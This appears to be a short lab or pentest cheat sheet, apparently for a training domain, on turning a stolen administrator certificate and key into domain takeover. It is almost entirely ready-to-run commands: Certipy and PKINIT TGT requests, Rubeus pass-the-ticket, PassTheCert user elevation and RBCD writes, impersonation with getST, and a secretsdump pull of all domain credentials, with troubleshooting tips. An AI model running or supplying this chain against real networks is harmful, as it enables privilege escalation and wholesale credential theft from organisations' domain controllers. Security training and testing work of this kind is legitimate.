Once we obtain a certificate and private key, we can authenticate through Kerberos PKINIT or through Schannel-backed LDAP. PKINIT gives us a TGT. PassTheCert gives us LDAP actions through TLS client certificate authentication.
Authenticate with Certipy
certipy auth -pfx administrator.pfx -domain ootw.local -dc-ip 10.10.10.200
export KRB5CCNAME=administrator.ccache
klist
Convert PFX to PEM
openssl pkcs12 -in administrator.pfx -clcerts -nokeys -out administrator.crt
openssl pkcs12 -in administrator.pfx -nocerts -out administrator.key
PKINITtools with PEM
gettgtpkinit.py -cert-pem administrator.crt -key-pem administrator.key -dc-ip 10.10.10.200 ootw.local/administrator administrator.ccache
export KRB5CCNAME=administrator.ccache
klist
Request service ticket
gettgs.py -dc-ip 10.10.10.200 -spn cifs/dc01.ootw.local administrator.ccache administrator_cifs.ccache
export KRB5CCNAME=administrator_cifs.ccache
smbclient -k //dc01.ootw.local/C$
Rubeus with PFX
Rubeus.exe asktgt /user:Administrator /domain:ootw.local /certificate:administrator.pfx /ptt
klist
PassTheCert elevate user
python3 passthecert.py -action modify_user -crt administrator.crt -key administrator.key -target student -elevate -domain ootw.local -dc-host dc01.ootw.local
PassTheCert write RBCD
python3 passthecert.py -dc-ip 10.10.10.200 -crt administrator.crt -key administrator.key -domain ootw.local -port 636 -action write_rbcd -delegate-to 'DC01$' -delegate-from 'ATTACKER01$'
Abuse RBCD after PassTheCert
getST.py -spn 'cifs/dc01.ootw.local' -impersonate Administrator -dc-ip 10.10.10.200 'ootw.local/ATTACKER01$:Password123!'
export KRB5CCNAME=Administrator.ccache
secretsdump.py -k -no-pass ootw.local/Administrator@dc01.ootw.local -dc-ip 10.10.10.200 -just-dc
Troubleshooting
PFX must include the private key.
DC must trust the issuing CA for PKINIT.
Certificate must map to the intended account.
Clock skew breaks Kerberos.
Use LDAPS port 636 for Schannel LDAP operations.
If PKINIT fails, try Schannel with PassTheCert.